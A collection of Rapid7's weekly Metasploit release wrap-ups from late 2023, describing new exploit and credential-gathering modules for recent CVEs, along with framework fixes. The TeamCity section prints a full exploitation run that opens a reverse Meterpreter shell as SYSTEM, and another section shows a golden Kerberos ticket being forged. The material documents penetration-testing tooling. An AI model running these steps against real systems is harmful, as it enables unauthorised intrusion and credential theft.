Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/11/23/metasploit-wrapup-74/

Enhancements and features (2)

• #18548 from zeroSteiner – Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
• #18552 from adfoster-r7 – Adds support for Ruby 3.3.0-preview3.

Bugs fixed (5)

• #18448 from HynekPetrak – Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
• #18538 from adfoster-r7 – Fixes an intermittent stream closed in another thread crash when booting msfconsole.
• #18547 from adfoster-r7 – This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
• #18558 from zeroSteiner – Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
• #18564 from zeroSteiner – Fixes a module crash when running the auxiliary/server/capture/http module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.43…6.3.44
• Full diff 6.3.43…6.3.44

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/11/17/metasploit-weekly-wrap-up-36/

Possible Web Service Removal

Metasploit has support for running with a local database, or from a remote web service which can be initialized with msfdb init --component webservice. Future versions of Metasploit Framework may remove the msfdb remote webservice. Users that leverage this functionality are invited to react on an issue currently on GitHub to inform the maintainers that the feature is used.

New module content (1)

ZoneMinder Snapshots Command Injection

Authors: UnblvR and whotwagner
Type: Exploit
Pull request: #18434 contributed by whotwagner
Path: unix/webapp/zoneminder_snapshots

Description: This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).

Enhancements and features (1)

• #18440 from adfoster-r7 – This alerts users that the remote web service will be removed. It prompts them to respond to an issue on GitHub if the removal will affect them.

Bugs fixed (1)

• #18532 from adfoster-r7 – Fixes db2 scanner module crashes.

Documentation added (1)

• #18524 from bradyjackson – Updates the modules/payload/android/meterpreter/reverse_tcp.md example to use the correct flags when generating a payload.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.42…6.3.43
• Full diff 6.3.42…6.3.43

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/11/10/metasploit-weekly-wrap-up-35/

Apache MQ and Three Cisco Modules in a Trenchcoat

This week’s release has a lot of new content and features modules targeting two major recent vulnerabilities that got a great deal of attention: CVE-2023-46604 targeting Apache MQ resulting in ransomware deployment and CVE-2023-20198 targeting Cisco IOS XE OS.

New module content (8)

Cisco IOS-XE unauthenticated Command Line Interface (CLI) execution

Author: sfewer-r7
Type: Auxiliary
Pull request: #18507 contributed by sfewer-r7
Path: admin/http/cisco_ios_xe_cli_exec_cve_2023_20198

Description: This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.

MagnusBilling application unauthenticated Remote Command Execution.

Authors: Eldstal and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18481 contributed by h00die-gr3y
Path: linux/http/magnusbilling_unauth_rce_cve_2023_30258

Description: This adds an exploit module that leverages CVE-2023-30258, a command injection vulnerability in MagnusBilling versions 6 and 7 that allows unauthenticated remote code execution in the context of the user running the web server process.

Apache ActiveMQ Unauthenticated Remote Code Execution

Authors: X1r0z and sfewer-r7
Type: Exploit
Pull request: #18501 contributed by sfewer-r7
Path: multi/misc/apache_activemq_rce_cve_2023_46604

Description: This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.

AjaxPro Deserialization Remote Code Execution

Authors: Hans-Martin Münch (MOGWAI LABS) and Jemmy Wang
Type: Exploit
Pull request: #18494 contributed by Jemmy1228
Path: windows/http/ajaxpro_deserialization_rce

Description: This PR adds an RCE module for AjaxPro which leverages an insecure deserialization of data to get remote code execution on the target OS in the context of the user running the website which utilized AjaxPro.

Apache NiFi Credentials Gather

Authors: Topaco and h00die
Type: Post
Pull request: #18503 contributed by h00die
Path: linux/gather/apache_nifi_credentials

Description: This PR adds a post module to steal config and credential information for Apache NiFi.

Windows Gather PL/SQL Developer Connection Credentials

Authors: Adam Caudill and Jemmy Wang
Type: Post
Pull request: #18491
Path: windows/gather/credentials/plsql_developer

Description: Unable to find PR information, please complete manually

Enhancements and features (3)

• #18218 from gardnerapp – This PR reduces the number of requests the Windows checkvm post module sends to the host when attempting to determine what hypervisor the session is running in by saving the initial responses in instance variables for later use in the module. The PR also includes many other general code improvements.
• #18379 from dwelch-r7 – This PR improves the Kerberos service authenticator hostname matching for ccache credentials. Prior to this change the service authenticator was filtering out valid credentials when the hostname wasn’t an exact match when credentials for a domain (i.e. windomain.local) should work on a subdomain (i.e. dc.windomain.local).
• #18504 from h00die – Updates the auxiliary/scanner/http/grafana_plugin_traversal module to include a disclosure date and a link to the original disclosure blog post.

Bugs fixed (1)

• #18506 from zeroSteiner – This PR fixes a stability issue with the f5_bigip_tmui_rce_cve_2023_46747 module. Prior to this fix, occasionally the module would fail on login as things were running too quickly. The module now retries logging in if the first attempt fails.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.41…6.3.42
• Full diff 6.3.41…6.3.42

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/11/03/metasploit-weekly-wrap-up-34/

PTT for DCSync

This week, community member smashery made an improvement to the windows_secrets_dump module to enable it to dump domain hashes using the DCSync method after having authenticated with a Kerberos ticket. Now, if a user has a valid Kerberos ticket for a privileged account, they can run the windows_secrets_dump module with the DOMAIN action and obtain the desired information. No password required. This is particularly useful in workflows involving the exploitation of AD/CS, using the ESC family of techniques.

New module content (2)

Citrix ADC (NetScaler) Bleed Scanner

Authors: Dylan Pindur and Spencer McIntyre
Type: Auxiliary
Pull request: #18492 contributed by zeroSteiner
Path: scanner/http/citrix_bleed_cve_2023_4966

Description: This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.

F5 BIG-IP TMUI AJP Smuggling RCE

Authors: Michael Weber, Sandeep Singh, Spencer McIntyre, and Thomas Hendrickson
Type: Exploit
Pull request: #18497 contributed by zeroSteiner
Path: linux/http/f5_bigip_tmui_rce_cve_2023_46747

Description: This module exploits a flaw in F5s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.

Enhancements and features (3)

• #18386 from e-lliot – :
  This adds the lmkdir command to Meterpreter, which creates a directory on the local host.
• #18441 from sjanusz-r7 – Adds at rest encryption to Meterpreter payloads on the Metasploit host machine’s file system.
• #18419 from smashery – This updates the windows_secrets_dump module’s DCSync technique (the DOMAIN action) to use Kerberos tickets for authentication. Users can now use Kerberos tickets for authentication with all actions in the module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.40…6.3.41
• Full diff 6.3.40…6.3.41

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/10/27/metasploit-weekly-wrap-up-33/

New module content (4)

Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control

Authors: Emir Polat and Unknown
Type: Auxiliary
Pull request: #18447 contributed by emirpolatt
Path: admin/http/atlassian_confluence_auth_bypass
AttackerKB reference: CVE-2023-22515

Description: This adds an exploit for CVE-2023-22515, which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.

VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure

Authors: Harsh Jaiswal ( <Harsh Jaiswal (@rootxharsh)>, Rahul Maini ( <Rahul Maini (@iamnoooob)>, SinSinology, and h00die
Type: Exploit
Pull request: #18460 contributed by h00die
Path: linux/ssh/vmware_vrni_known_privkey

Description: This adds a new exploit module that leverages the fact that SSH keys on VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0 are not randomized on initialization. It tries all the default SSH keys until one succeeds and gains unauthorized remote access as the "support" (root) user.

Splunk "edit_user" Capability Privilege Escalation

Authors: Heyder Andrade, Mr Hack (try_to_hack) Santiago Lopez, and Redway Security <redwaysecurity.com>
Type: Exploit
Pull request: #18348 contributed by heyder
Path: multi/http/splunk_privilege_escalation_cve_2023_32707

Description: This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, that allows a low privilege user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

Add a new user to the system

Author: Nick Cottrell [email protected]
Type: Post
Pull request: #18194 contributed by rad10
Path: linux/manage/adduser

Description: This adds a post module that creates a new user on the target OS. It tries to use standard tools already available on the system, but it’s also able to directly update the plaintext database files (/etc/passwd and /etc/shadow). This module requires root privileges.

Enhancements and features (4)

• #18299 from zgoldman-r7 – Improves error messages for timeouts when interacting with a Meterpreter session. Previously an unclear error was printed. Now the user is notified how to increase the timeout limit.
• #18421 from smashery – This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.
• #18466 from nfsec – Updates the Docker entrypoint script to use getent instead of grep when detecting user/group details.
• #18299 from h00die – This adds a db_stats command which gives the user information about how much data is in their database/workspace.

Bugs fixed (2)

• #18400 from dwelch-r7 – This fixes an issue when searching for a Kerberos ticket and passing in the workspace. The workspace is now correctly used to query the database.
• #18403 from cdelafuente-r7 – Fixes a potential bug with modules that register files to cleanup after a session opens. Previously modules could accidentally mutate registered file names to delete, causing the intended files to be left on the remote system still.

Documentation added (1)

• #18470 from zgoldman-r7 – Adds a new Wiki page for session management, detailing how to search for sessions and killing stale sessions.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.39…6.3.40
• Full diff 6.3.39…6.3.40

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/10/19/metasploit-weekly-wrap-up-32/

That Privilege Escalation Escalated Quickly

This release features a module leveraging CVE-2023-22515, a vulnerability in Atlassian’s on-premises Confluence Server first listed as a privilege escalation, but quickly recategorized as a “broken access control” with a CVSS score of 10. The exploit itself is very simple and easy to use so there was little surprise when CISA published an advisory stating that threat actors were using it in the wild. It is imperative that anyone using the affected versions mitigate risk and patch as quickly as possible.

Improved sessions searching

This release enhances the sessions command with additional search filters, for instance:

sessions -S 'sesion_id:1 session_id:5'
sessions -S 'session_type:meterpreter'
sessions -S 'last_checkin:greater_than:1h10m last_checkin:less_than:2h'

These search options can be used in conjunction with other session options. For instance the --verbose flag:

msf6 exploit(windows/smb/psexec) > sessions -S 'last_checkin:greater_than:2h30m' -v

Active sessions
===============

  Session ID: 8
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WINDEV
      Tunnel: 192.168.123.1:4444 -> 192.168.123.132:50564 (192.168.123.132)
         Via: exploit/windows/smb/psexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 4d78f75abbdbf0c8/x86=1/windows=1/2023-10-19T19:44:23Z
     CheckIn: 18003s ago @ 2023-10-19 15:45:30 +0100
  Registered: No

  Session ID: 9
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WINDEV
      Tunnel: 192.168.123.1:4444 -> 192.168.123.132:50565 (192.168.123.132)
         Via: exploit/windows/smb/psexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 48d32692e0633293/x86=1/windows=1/2023-10-19T19:44:23Z
     CheckIn: 10803s ago @ 2023-10-19 17:45:30 +0100
  Registered: No

Or as an easy way to search for and kill matching stale sessions with --kill-all:

msf6 exploit(windows/smb/psexec) > sessions -S 'last_checkin:greater_than:2h30m' -K
[*] Killing matching sessions...

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV  192.168.123.1:4444 -> 192.168.123.132:50540 (192.168.123.132)
  5         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV  192.168.123.1:4444 -> 192.168.123.132:50555 (192.168.123.132)

[*] 192.168.123.132 - Meterpreter session 4 closed.
[*] 192.168.123.132 - Meterpreter session 5 closed.

New module content (2)

Apache Superset Signed Cookie RCE

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Exploit
Pull request: #18351 contributed by h00die
Path: linux/http/apache_superset_cookie_sig_rce

Description: This adds an exploit for CVE-2023-37941 which is an authenticated RCE in Apache Superset.

Atlassian Confluence Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18461 contributed by sfewer-r7
Path: multi/http/atlassian_confluence_rce_cve_2023_22515

Description: This adds an exploit module that leverages an improper input validation issue in Atlassian Confluence versions between 8.0.0 through to 8.3.2, 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1. This vulnerability is identified as CVE-2023-22515 and allows unauthenticated remote code execution. The module first creates a new administrator by abusing the embedded XWorks2 middleware and uploading a malicious plugin to get code execution. Note that the module is currently not able to delete the new administrator account it created. This would require a manual clean up.

Enhancements and features (7)

• #17689 from manishkumarr1017 – Adds an additional column to the creds command to additionally show any cracked passwords that have been created by the auxiliary/analyze/crack_databases module or similar.
• #18364 from zgoldman-r7 – Add support for filtering sessions based on last checkin time, session type and id.
• #18381 from sjanusz-r7 – Adds new options -r and --reload-libs to the check, recheck, to_handler, reload, run and rerun commands. This new option will reload all library files before performing the original command.
• #18428 from AleksaZatezalo – This PR adds documentation for the mssql_login module.
• #18438 from adfoster-r7 – Makes improvements to the UX for database management prompts. Now when running msfdb init the user is no longer prompted for database deletion. The message for clearing unused data service credentials has been reworded.
• #18450 from adfoster-r7 – Adds support for Ruby 3.3.0-preview2.
• #18451 from adfoster-r7 – Updates the newly added cracked password column as part of the creds to work with the remote database.

Bugs fixed (3)

• #18442 from adfoster-r7 – Improves stability of msfdb initialization on windows environments. Previously the msfdb init script would hang indefinitely on Windows environments, as well as there being false negatives on detecting if the database was running or not.
• #18443 from adfoster-r7 – Adds a fix for the handler/reverse_ssh module that was returning warnings when msfconsole was booted on a Windows machine.
• #18449 from adfoster-r7 – Fixes an issue with the scanner/mysql/mysql_authbypass_hashdump module to now correctly close sockets.

Documentation added (1)

• #18452 from jheysel-r7 – Updates the Metasploit Wiki to include information on how to run quality tools on module documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.38…6.3.39
• Full diff 6.3.38…6.3.39

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/10/13/metasploit-weekly-wrap-up-31/

Pollution in Kibana

This week, contributor h00die added a module that leverages a prototype pollution bug in Kibana prior to version 7.6.3. Particularly, this issue is within the Upgrade Assistant and enables an attacker to execute arbitrary code. This vulnerability can be triggered by sending a queries that sets a new constructor.prototype.sourceURL directly to Elastic or by using Kibana to submit the same queries. Note that Kibana needs to be restarted or wait for collection to happen for the payload to execute. This vulnerability doesn’t seem to be assigned a CVE. The module has been written based on a detailed description from Alex Brasetvik (alexbrasetvik) in a Hackerone report.

Torch chain attack

Our very own zeroSteiner added a module that exploits PyTorch model server by chaining multiple vulnerabilities. First, it takes advantage of a weak default configuration that binds the management interface to all IP addresses. Then, once it reaches the management interface, the module exploits a Server-Side Request Forgery vulnerability (CVE-2023-43654) to register MAR (Model Archive) model files from arbitrary servers. Finally, it leverages a vulnerability in SnakeYaml (CVE-2022-1471) that allows code execution when a YAML file is deserialized by SnakeYaml. The module embeds a malicious YAML file in a MAR file and gets an arbitrary Java class executed when this MAR file is loaded.

Updated MySQL version support

Thanks to the work of Rory McKinley, multiple MySQL modules now support authentication against newer MySQL 8.0 versions. This required a lot of effort unearthing and patching historical code across multiple contributions to the Metasploit codebase, and to the Ruby MySQL library dependency. MySQL module highlights include:

• auxiliary/scanner/mysql/mysql_login – Bruteforce and manual verification of MySQL credentials
• auxiliary/scanner/mysql/mysql_version – MySQL Server Version Enumeration
• auxiliary/scanner/mysql/mysql_hashdump – MySQL password hashdump support
• auxiliary/scanner/mysql/mysql_schemadump – Extracting MySQL schema details
• auxiliary/admin/mysql/mysql_sql – Run arbitrary MySQL SQL queries against a given target

New module content (2)

Kibana Upgrade Assistant Telemetry Collector Prototype Pollution

Authors: Alex Brasetvik (alexbrasetvik) and h00die
Type: Exploit
Pull request: #18417 contributed by h00die
Path: linux/http/kibana_upgrade_assistant_telemetry_rce

Description: Kibana before version 7.6.3 suffers from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we’re able to execute arbitrary code in the context of the Kibana user. There is no CVE for this at the moment.

PyTorch Model Server Registration and Deserialization RCE

Authors: Gal Elbaz, Guy Kaplan, Idan Levcovich, Spencer McIntyre, and Swapneil Kumar Dash
Type: Exploit
Pull request: #18427 contributed by zeroSteiner
Path: multi/http/torchserver_cve_2023_43654

Description: This PR adds a module that exploits PyTorch TorchServer by chaining an SSRF vulnerability with a deserialization RCE vulnerability to permit an unauthenticated remote attacker arbitrary Java code execution. The PR also fixes how the ClassLoader mixin handles datastore options.

Enhancements and features (6)

• #18171 from dwelch-r7 – This fixes an issue when users use a payload when framework is started with the --defer-module-loads flag set. This also adds a new feature flag option defer_module_loads which, when enabled, will defer module loads by default without the need to specify--defer-module-loads every time the framework boots. Finally, this comes with a sizable improvement on frameworks boot up time.
• #18256 from jmartin-tech – Performs a routine update of multiple library dependencies.
• #18296 from rorymckinley – Updates multiple MySQL modules to support authenticating with newer versions of MySQL.
• #18383 from cgranleese-r7 – This adds a variety of improvements to the enum_computers module including Shell and Powershell support as well as improvements when running on non-english systems.

Bugs fixed (2)

• #18411 from rtpt-erikgeiser – Fixes an issue where the services -R command generated invalid hosts such as 192.0.2.2% if an empty string was registered for the scope metadata instead of nil.
• #18431 from zeroSteiner – This switches the way in which port forwarded IPs are displayed so that the local IP is listed under local and the remote IP is listed under remote.

Documentation added (1)

• #18394 from errorxyz – This adds documentation for the auxiliary/scanner/http/http_traversal module.
• #18435 from h00die – Fixes multiple spelling mistakes in the Wiki.
• #18444 from h00die – Fixes spelling mistakes in module documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.37…6.3.38
• Full diff 6.3.37…6.3.38

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2023/10/06/metasploit-weekly-wrap-up-30/

New module content (3)

LDAP Login Scanner

Author: Dean Welch
Type: Auxiliary
Pull request: #18197 contributed by dwelch-r7
Path: scanner/ldap/ldap_login

Description: This PR adds a new login scanner module for LDAP. Login scanners are the classes that provide functionality for testing authentication against various different protocols and mechanisms. This LDAP login scanner supports multiple types of authentication including: Plaintext, NTLM, Kerberos and SChannel.

Junos OS PHPRC Environment Variable Manipulation RCE

Authors: Jacob Baines, Ron Bowes, and jheysel-r7
Type: Exploit
Pull request: #18389 contributed by jheysel-r7
Path: freebsd/http/junos_phprc_auto_prepend_file

Description: This adds an exploit module that leverages a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. This vulnerability is identified as CVE-2023-36845 and allows an attacker to achieve unauthenticated remote code execution as a low privileged user. This module also includes a jailbreak feature that consists in changing the root password and establishing an SSH session as the root user. The original password is restored when the module terminates.

Progress Software WS_FTP Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18414 contributed by sfewer-r7
Path: windows/http/ws_ftp_rce_cve_2023_40044

Description: This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.

AttackerKB Assessment: (https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis)

Enhancements and features (6)

• #17919 from bcoles – This PR adds support for starting and stopping Windows services using the service control manager to shell payloads.
• #18338 from smashery – This PR updates the kerberos.rb library such that when a kerberos login is attempted, on a user where pre-authentication is not required, the module now requests a RRC4-HMAC ticket, since it’s more easily crackable.
• #18363 from j0ev – This PR adds support to outputting payloads in octal in both framework and venom.
• #18412 from zeroSteiner – This adds additional usage tips to Metasploit, expanding the pool that is selected from on startup.
• #18420 from smashery – :
  This PR updates the user-agent string reported by our http payloads. We update this periodically to make sure that our payloads don’t stick out having an older user agent string.
• #18425 from adfoster-r7 – Adds history support to the nasm and metasm shells. Now when re-opening these shells, previously typed commands should be remembered and available.

Bugs fixed (1)

• #18372 from gcarmix – Fixed an issue in the generic shell download command.

Documentation added (3)

• #18277 from cnnrshd –
  This PR adds new documentation for how to create a command injection exploit module.
• #18347 from bwatters-r7 – This PR updates the how-to-write-a-check-method docs to better explain to not use fail_with to align with best practices when making sure a check method returns a check code.
• #18393 from adfoster-r7 – Updates the running modules landing page on the Wiki with more beginner friendly information on searching for and running modules.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.36…6.3.37
• Full diff 6.3.36…6.3.37

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/09/29/metasploit-weekly-wrap-up-29/

TeamCity authentication bypass and remote code execution

This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.

This exploit works against both Windows and Linux targets. Example usage:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting the authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >

New module content (2)

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for JetBrain’s TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

Microsoft Error Reporting Local Privilege Elevation Vulnerability

Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10×64 22H2.

Enhancements and features (1)

• #18399 from h00die – Fixes multiple spelling mistakes in module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.35…6.3.36
• Full diff 6.3.35…6.3.36

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/09/22/metasploit-weekly-wrap-up-28/

Improved Ticket Forging

Metasploit’s admin/kerberos/forge_ticket module has been updated to work with Server 2022. In Windows Server 2022, Microsoft started requiring additional new PAC elements to be present – the PAC requestor and PAC attributes. The newly forged tickets will have the necessary elements added automatically based on the user provided domain SID and user RID. For example:

msf6 auxiliary(admin/kerberos/forge_ticket) > run aes_key=4a52b73cf37ba06cf693c40f352e2f4d2002ef61f6031f64924fb50be1e23978 domain_sid=S-1-5-21-1242350107-3695253863-3717863007 USER_RID=500 domain=demo.local user=Administrator action=FORGE_GOLDEN

[*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230915213733_default_unknown_mit.kerberos.cca_219182.bin
[*] Primary Principal: [email protected]
Ccache version: 4

....
            Pac Requestor:
              SID: S-1-5-21-1242350107-3695253863-3717863007-500
            Pac Attributes:
              Flag length: 2
              Flags: 1
                .... .... .... .... .... .... .... ..0. Pac Was Requested: The PAC_WAS_REQUESTED bit is NOT SET
                .... .... .... .... .... .... .... ...1 Pac Was Given Implicitly: The PAC_WAS_GIVEN_IMPLICITLY bit is SET
            Pac Server Checksum:
              Signature: 1f94f52598b37bb9cf7e3995
            Pac Privilege Server Checksum:
              Signature: 79ec20b7d4b8e77e5c056563

The domain SID and user RIDs can be obtained using the auxiliary/gather/ldap_query module with the ENUM_DOMAIN and ENUM_ACCOUNTS actions.

New module content (5)

Apache Airflow 1.10.10 – Example DAG Remote Code Execution

Authors: Ismail E. Dawoodjee, Pepe Berba, and xuxiang
Type: Exploit
Pull request: #18283 contributed by ismaildawoodjee
Path: linux/http/apache_airflow_dag_rce

